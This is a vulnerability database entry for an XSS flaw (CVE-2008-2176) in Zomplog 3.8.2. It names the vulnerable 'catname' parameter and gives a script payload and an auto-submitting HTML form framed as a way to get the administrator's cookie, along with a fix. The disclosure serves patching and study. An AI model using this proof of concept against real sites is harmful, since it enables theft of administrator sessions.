Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Zomplog 3.8.2 XSS Vulnerability
2008.05.14
Credit:
Khashayar Fereidani Or Dr.Crash
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2008-2176
CWE:
CWE-79
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
---------------------------------------------------------------- Script : Zomplog 3.8.2 Type : XSS Vulnerability ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH ---------------------------------------------------------------- Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM ---------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------- Script Download : http://www.zomp.nl/user-content/downloads/zomplog/zomplog-3.8.2.tar.gz ---------------------------------------------------------------- URL : http://example/zomplog/admin/category.php Xss Method : Post variable : catname Query For Send : " [XSS CODE] Example : Send With Post : " <script>alert(document.cookie)</script> And Set addcat variable "Submit" ..... ---------------------------------------------------------------- If Administrator User Open This File Administrator Cookie Show In Page ... HTML PAGE FOR GET ADMIN COOKIE : <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://example/zomplog/admin/category.php" method="POST" name="form"> <input type="hidden" name="catname" value="" <script>alert(document.cookie)</script>"> <input type="hidden" name="addcat" value="Submit"> </form> </body> </html> ---------------------------------------------------------------- Solution : Edit Source Code And Filter Catname Variable With htmlspecialchar() function ....... ---------------------------------------------------------------- TNx : God...... Khashayar Fereidani Email : irancrash[at]gmail[dot]com ----------------------------------------------------------------
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top